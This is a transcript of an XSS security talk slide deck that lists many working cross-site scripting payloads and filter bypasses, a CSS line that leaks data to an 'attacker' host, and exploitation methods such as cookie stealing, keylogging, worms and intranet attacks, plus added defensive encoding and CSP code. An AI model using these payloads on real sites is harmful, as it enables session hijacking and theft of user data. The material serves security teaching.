XSS is more than a simple threat

Upload: avadanei-andrei

Post on 08-May-2015

DESCRIPTION

XSS is more than you can imagine. You should take a look.

TRANSCRIPT

Page 1

XSS is more than a simple threat

Avădănei Andrei, Software Developer, Blogger, Student

www.worldit.info

@AndreiAvadanei

[email protected]

#RoCyberCon, 20 February

Page 2

Introduction to XSS

- Short story
- XSS types
- Shouts

Page 3

Short story

XSS - it's a client-side vulnerability

- ... but it can become a server-side one

- based on JavaScript injection

- ... and HTML, Java, ActiveX, VBScript, Flash, JSON and so on

- the second most popular threat in 2010 (via Infosec & OWASP)

- with many resources available on the Internet (use Google)

Page 4

XSS Types

Non-persistent (reflected)

- the most common type of XSS injection

- requires server-side interpretation of the query

- a third party is required

Persistent (stored)

- the most dangerous type of XSS injection

- requires server-side interpretation of the query and data storage

- a third party may not be required

DOM-based

- the newest type of XSS injection

- requires client-side interpretation

- usually non-persistent

Page 5

Shouts #1 – XSS Amazon

Page 6

Shouts #2 – XSS Facebook

Page 7

Shouts #3 – XSS Google

Page 8

Shouts #4 – XSS eBay

Page 9

Shouts #5 – More XSS'ed

Twitter, MySpace, Hi5, WordPress, Yahoo, Joomla, phpBB, Drupal, e107, WorldIT.info, PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, YouTube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc.

Page 10

Getting XSS'ed

- Where?
- Basic XSS'ing
- Advanced XSS'ing
- HTML 5 XSS'ed
- Bypass XSS protection

Page 11

Where? Everywhere

Rule: "Do not trust anything, ever, especially when it comes to user input." XSS vulnerabilities can be found in anything that comes from the user. GET, POST, COOKIE, FILES, SERVER and headers are the main targets. Try to be clever.

Page 12

Basic XSS'ing

<script>alert(1)</script> //basic

"><script>alert(1)</script> //bypass an open tag

<!--<img src="--><img src=x onerror=alert(1)//"> //bypass & generate an error

" onmouseover="alert(1)" //all JavaScript events

alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors

<script>alert(String.fromCharCode(88,83,83));</script> //bypass quote filters

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> //unicode injection; UTF-8, hex, decimal or octal injection may work

<meta http-equiv="refresh" content="0;url=http://;javascript:..." // evasion

<style type=text/javascript>alert('xss')</style> //JavaScript injection based on the style tag

"><img src="x:x" onerror="alert(0)"> // :D

[…]

Page 13

Advanced XSS'ing

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> //background & unicode

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> //sends IE into a loop

<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> //XSS in an XML document

x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)(); //something different from the everyday injections

Function('a\x6cert(1)')();// ;)

x=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection

[...]

Page 14

HTML 5 XSS'ed

- new technologies, new problems

<video onerror="javascript:alert(1)"><source> //new tag

<audio onerror="javascript:alert(1)"><source> //another new tag

<form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events

<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil payload')"> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes

<input type="text" AUTOFOCUS onfocus=alert(1)> //autofocus fires the event without user interaction

<script>alert(localStorage.getItem('foo'))</script> //access local storage

"><script>(history.pushState({},'','index.php'))(document.forms[0].action='http://maliciousURL')</script> //conceal the real location and replace it with anything we want. Ex: http://bit.ly/pushStateXSS

Page 15

Bypass XSS protection

<img/src="mars.png"alt="mars"> //no white spaces, use / instead

<object data="javascript:alert(0)"> //avoid src

<isindex type=image src=1 onerror=alert(1)> //did you know the isindex tag?

<img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation

location=location.hash.slice(1); //avoid the #

http://victim.com?param=";location=location.hash)//#0={};alert(0) //payload after the hash in the URL; the victim won't see the true payload

alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results

""+{toString:alert} or ""+{valueOf:alert} //executes a function without using () or =

Future tricks in HTML 5

</a onmousemove="alert(1)"> //HTML 5 will support events in closing tags

<style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure CSS-based XSS

data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg== //avoid using the plain text/html value

?injection=<script+&injection=>alert(1)></script> //HPP (HTTP Parameter Pollution), popular in SQLi

via BlackHat conferences.
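Every vector on pages 12 to 15 depends on one of two things: untrusted data landing in an HTML, attribute or JavaScript context without the encoding that context needs, or a URL whose scheme the browser will execute (javascript:, data:), possibly hidden behind numeric entities or embedded whitespace. The block below is an added example, not code from the slides or their author, showing the context-aware output encoding and URL canonicalisation that make those vectors inert on the server side, which is the "Input / Output encoding" item on the prevention slide. It runs under plain Node.js; the function names, the SAFE_SCHEMES allow-list and the renderSearchPage() layout are this example's own choices, and the slide-4 reflected case is what renderSearchPage() models.

```javascript
// Added example, not from the slides: context-aware output encoding plus URL
// validation for a reflected (slide 4) search page. Plain Node.js, no deps.

// Text-node and quoted-attribute context: neutralise every character that can
// close a tag, close a quoted attribute or start an entity. Always quote the
// attribute you write into; an unquoted attribute ends at whitespace.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => `&#${ch.charCodeAt(0)};`);
}

// JavaScript string-literal context: escape everything outside [A-Za-z0-9]
// as \uXXXX so no input can end the literal, the statement or the <script>.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The HTML parser decodes numeric entities before the URL is parsed, so the
// slide-12 form "&#106;&#97;..." is "javascript:" by the time the browser
// looks at the scheme. Decode the same way before inspecting it.
function decodeNumericEntities(text) {
  const cp = (n) => (n > 0x10ffff ? '\ufffd' : String.fromCodePoint(n));
  return text
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => cp(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => cp(parseInt(dec, 10)));
}

// Browsers strip ASCII control characters and whitespace while parsing a URL,
// so "java\tscript:" still means "javascript:". Canonicalise before matching.
function canonicalUrl(raw) {
  return decodeNumericEntities(String(raw))
    .replace(/[\u0000-\u0020\u007f]/g, '')
    .toLowerCase();
}

// Allow-list of schemes (this example's choice); everything else, including
// javascript:, data: and vbscript:, is rejected.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrl(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/.exec(canonicalUrl(raw));
  if (!m) return true; // no scheme: a relative URL cannot carry a script scheme
  return SAFE_SCHEMES.has(m[1]);
}

// For navigation targets taken from untrusted data (location.hash, a "next"
// parameter, history.pushState): accept only an absolute path on this
// origin, refusing scheme-relative "//host" and the backslash variant "/\host".
function isSafeSameOriginPath(raw) {
  return /^\/(?![\/\\])/.test(canonicalUrl(raw));
}

// An anchor whose label and target are both untrusted.
function renderLink(label, href) {
  const target = isSafeUrl(href) ? href : '#';
  return `<a href="${encodeForHtml(target)}">${encodeForHtml(label)}</a>`;
}

// The reflected case: the same query lands in a text node, a quoted attribute
// and a JS string, each through the encoder for that context.
function renderSearchPage(query) {
  return [
    `<p>Results for: ${encodeForHtml(query)}</p>`,
    `<input type="text" name="q" value="${encodeForHtml(query)}">`,
    `<script>var q = "${encodeForJsString(query)}";</script>`,
  ].join('\n');
}
```

The one `<script>` in renderSearchPage() is the page's own; nothing the query contains can add a second one or close the existing one, because `<`, `"` and `/` never reach the output unencoded. Note the division of labour: encoding protects the HTML and JavaScript contexts, but a URL needs the scheme check as well, since `javascript:alert(1)` contains nothing the HTML encoder would touch.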

Page 16

XSS Injection Exploitation (part 1)

- Redirection
- Clickjacking
- URL Spoofing
- Session hijacking
- Cookie stuffing
- Ad Hijacking
- CSRF/XSRF attacks
- History stealing
- XSS Defacement
- Key & Mouse logging

Page 17

Redirection & Clickjacking

Redirection

- redirect your victim, e.g. document.location = "http://www.your-evil-site.com";

- you create fake traffic

- popular

Clickjacking

- describes one website that poses as another

- e.g. redirect the victim to you on an onclick event

- used in phishing, gives high credibility

- extremely popular

Page 18

URL Spoofing

- popular in phishing

- the URL is user-friendly

- the web page content is hijacked and all information is sent to websites monitored by a thief

- extremely popular

Page 19

Session Hijacking

- also known as "Cookie Stealing"

- usually done with document.cookie

- helps you gain control over another user's logged-in session

- needs a cookie grabber

- for instance, an XSS in *.yahoo.com can help you hijack Yahoo accounts

- extremely popular

Page 20

Cookie stuffing

- also known as cookie dropping

- used in blackhat online marketing

- generates illegitimate affiliate sales by hijacking cookies

- uses pop-ups, frames and iframes, images, JavaScript, stylesheets or Flash to accomplish the cookie dropping

- popular

Page 21

Ad Hijacking

- used in blackhat online marketing

- usually requires persistent XSS

- you can replace the ad scripts with your own, getting paid when the user clicks on the hijacked ads

- popular

Page 22

CSRF/XSRF attacks

- unauthorized commands are transmitted from a user that the website trusts

- usually used along with <img src="">; for instance, if <img src="http://victim.com/?do=logout" /> is permanently injected and a user accesses the page with the malformed content, he will be forced to log out

- use your imagination, you can do more than that

Page 23

History Stealing

- you can find out what sites have been visited by the victim using "getComputedStyle" as below, after you have created a node with the CSS :visited selector set to a custom, known color:

document.defaultView.getComputedStyle(link, null).getPropertyValue("color");

- rarely used, but still important

- it could be done using the full power of HTML 5

Page 24

XSS Defacement

- looks like a server-side defaced page ... but it's only a client-side deface

- can create chaos and confusion when used for hacking a website

- involves changing the HTML content of the page

- of course, two types: persistent and non-persistent

- persistent XSS defacements are more dangerous than non-persistent ones

Page 25

Key & Mouse Logging

Keylogging - log all keystrokes and send them remotely

- document.onkeypress / unsafeWindow.onkeypress events

- store the keystrokes in a local variable and send them regularly to a remote server

Mouse logging - log all mouse moves and send them remotely

- document.onmousemove event

- dangerous but not so popular

Page 26

Tired?

You shouldn't be, because this is only the beginning...

Page 27

XSS Injection Exploitation (part 2)

- Browser hijacking
- Port Scanning
- DDoS
- XSS Tunneling
- Distributed Password Cracking
- Worms (Spreading)
- Arbitrary file execution & Privilege escalation
- Intranet Hacking

Page 28

Browser Hijacking

- also known as Tab Hijacking

- highly recommended when the hacker wants a second shot at the victims

- XSS shells usually do it for you

- with iframe injection

- works until the victim closes the tab

- the only drawback of this method is that the URL bar does not change with each click, which may or may not be noticeable to the user

Page 29

Distributed port scanning

- cross-domain XMLHttpRequests and WebSockets can perform remote port scanning, but using XSS you can do distributed remote port scanning

- the latest Firefox, Chrome or Safari already support these new technologies

- this option is not available yet, but it will be in the next generation of XSS Shell

- Firefox & Safari connection time is less than 100 ms

- 1 victim – 65,000 scanned ports – 6,500 seconds

- 100 victims – 65,000 scanned ports – 6.5 seconds

- what about 1,000 or 10,000 victims?

Page 30

DDoS

- based on WebSockets

- application-level DDoS attacks (layer 7 DDoS)

- Cross Origin Requests (COR) are processed even if the site has restrictions, and therefore the request will create load on the server

- 1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with GET requests

- 1 minute – 600 browsers – over 100,000 requests / minute can be enough to shut down a target

- we should wait for the majority of the browsers in the world to be upgraded

- but blackhat teams will be prepared with amazing tools for DDoS

Page 31

XSS Tunneling

- an XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack. At a technical level, it may be an Ajax application. Node.js and Comet push can make a difference in future XSS shells.

- XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies.

- XSS Tunnel is the standard HTTP proxy which sits on an attacker's system.

- you can tunnel all your traffic through an XSS Channel

- you can build your own SSH-like protocol

- you can forget about the user session problem when hijacking is not possible because there is an IP address restriction

- again, your imagination is the limit

Page 32

Distributed Password Cracking

- JavaScript engines are becoming very fast. And we have WebWorkers.

- password guessing rates in JavaScript tools of 100,000 MD5 hashes/second

- ~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code

- but these days spreading methods are very effective. Why not 10,000 compromised machines?

- Ravan – a JavaScript distributed password cracker that uses HTML5 WebWorkers. Performs password cracking in background JavaScript threads. Supports salted MD5 and SHA hashes.

Page 33

Worms (spreading)

- one of the most efficient environments for worm propagation – social networking

- XSS Warhol Worm, Linear XSS Worm, Hydra XSS Worm

- Samy (2005) infected over 1,000,000 users on MySpace in 20 hours

- Yahoo!, Hi5, Twitter and Facebook could easily be the next targets, on a larger scale

- you can simply attach a trojan to your worm, and the risks of creating permanent zombies are growing

Page 34

Arbitrary file execution

- in 2008 a vulnerability which affected IE 7 & IE 8 could execute arbitrary files using some social engineering skills

- during the last years a few other similar vulnerabilities appeared in the Internet jungle

- still, an XSS vulnerability and a CSRF vulnerability in an administrator file editor, which can be bypassed with XMLHttpRequest same-origin requests, and you have the right combination: an XSS vulnerability has become arbitrary code execution (privilege escalation)

- what are you waiting for? Find the next major privilege escalation vulnerability.

Page 35

Intranet Hacking (part 1)

Web browsers can be completely controlled by any web page, enabling them to become launching points for attacks on internal network resources. Why?

Page 36

Intranet Hacking (part 2)

Exploit procedure:

- a victim visits a malicious web page or clicks a nefarious link; embedded JavaScript malware then assumes control over their web browser

- the JavaScript malware loads a Java applet revealing the victim's internal NAT IP address

- then, using the victim's web browser as an attack platform, the JavaScript malware identifies and fingerprints web servers on the internal network

- attacks are initiated against internal or external web sites, and compromised information is sent outside the network for collection

Page 37

Intranet Hacking (part 3)

Collecting information:

- obtaining the NAT'ed IP address – MyAddress, a special Java applet

- port scanning – <script src=http://ip/></script>

- blind web server fingerprinting – explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting:

<img src="http://intranet_ip/unique_image_url" onerror="fingerprint()" />

Attack the intranet

- try different well-known vulnerabilities

- try hacking the web interface of DSL routers

- load local files using file:///

- get help from XSS Shells

Page 38

Preventing XSS attacks

- Filtering

- Input / Output encoding

- Web browser security:

  - select a safer browser (Chrome)

  - use a virtual machine for suspicious links

  - pay more attention to shortened URLs

  - use plugins for better security (like NoScript)
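The slide lists filtering and encoding on the server and NoScript on the client; the control that sits between them, a Content-Security-Policy response header, is what stops an injected payload from running even when encoding was missed, and stops the keylogger and cookie-grabber payloads from earlier slides from reaching their collection server. The block below is an added example, not code from the slides or their author: a small CSP evaluator that, given a policy string, answers whether an inline script or on* handler may execute and whether script may connect to a given host. It is plain Node.js and deliberately partial: nonce, hash, 'self', scheme and host sources only, no port matching, no 'strict-dynamic', and only connect-src is checked for exfiltration (img-src governs the `<img src=http://attacker...>` channel). SELF_ORIGIN, the nonce value and both policies are constructed for the example.

```javascript
// Added example, not from the slides: a minimal Content-Security-Policy
// evaluator for the two questions an XSS defender asks of a policy.
// Simplified on purpose; see the lead-in for what it does not model.

const SELF_ORIGIN = 'https://app.example'; // constructed: the protected origin

// "name v1 v2; name2 v3" -> Map(name -> [sources]). Per the spec, the first
// occurrence of a directive wins and later duplicates are ignored.
function parseCsp(header) {
  const policy = new Map();
  for (const part of String(header).split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Fetch directives fall back to default-src; null means nothing restricts it.
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (policy.has('default-src')) return policy.get('default-src');
  return null;
}

// Inline script (the <script>alert(1)</script> and onerror= vectors) runs only
// if 'unsafe-inline' is present and no nonce or hash source is: a nonce or
// hash in script-src makes browsers ignore 'unsafe-inline'.
function allowsInlineScript(policy) {
  const sources = effectiveSources(policy, 'script-src');
  if (sources === null) return true;
  const lower = sources.map((s) => s.toLowerCase());
  const hasNonceOrHash = lower.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return !hasNonceOrHash && lower.includes("'unsafe-inline'");
}

// Host source: [scheme://]host[:port][/path]; a leading "*." matches subdomains.
function hostSourceMatches(source, target) {
  let rest = source;
  const schemeMatch = /^([a-z][a-z0-9+.-]*):\/\//.exec(rest);
  if (schemeMatch) {
    if (schemeMatch[1] + ':' !== target.protocol) return false;
    rest = rest.slice(schemeMatch[0].length);
  }
  const host = rest.split('/')[0].split(':')[0];
  if (host.startsWith('*.')) return target.hostname.endsWith(host.slice(1));
  return target.hostname === host;
}

// Can fetch/XHR/WebSocket from the page reach this URL?
function allowsConnectTo(policy, url) {
  const sources = effectiveSources(policy, 'connect-src');
  if (sources === null) return true;
  const target = new URL(url);
  return sources.some((s) => {
    const v = s.toLowerCase();
    if (v === '*') return true;
    if (v === "'self'") return target.origin === SELF_ORIGIN;
    if (/^[a-z][a-z0-9+.-]*:$/.test(v)) return target.protocol === v; // e.g. https:
    if (v.startsWith("'")) return false; // 'none', nonces, hashes never match a host
    return hostSourceMatches(v, target);
  });
}

// The weak policy leaves both doors open; the strict one closes both.
const WEAK_POLICY = "default-src *; script-src * 'unsafe-inline'";
const STRICT_POLICY =
  "default-src 'self'; script-src 'self' 'nonce-EXAMPLEnonce'; connect-src 'self' https://api.example";
```

Read WEAK_POLICY against the deck: `'unsafe-inline'` lets every `<script>` and `onerror=` vector on pages 12 to 15 run, and `default-src *` lets a keylogger post anywhere. STRICT_POLICY needs each legitimate inline script to carry the per-response nonce, which an injected payload cannot know, and confines script-initiated connections to the site itself and one API host, so a stolen cookie has nowhere to go over XHR or WebSocket.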

Page 39

Is XSS still a simple threat?

:)

Page 40

Questions?

Thanks. :)

Page 41

Bibliography

Experience & Google.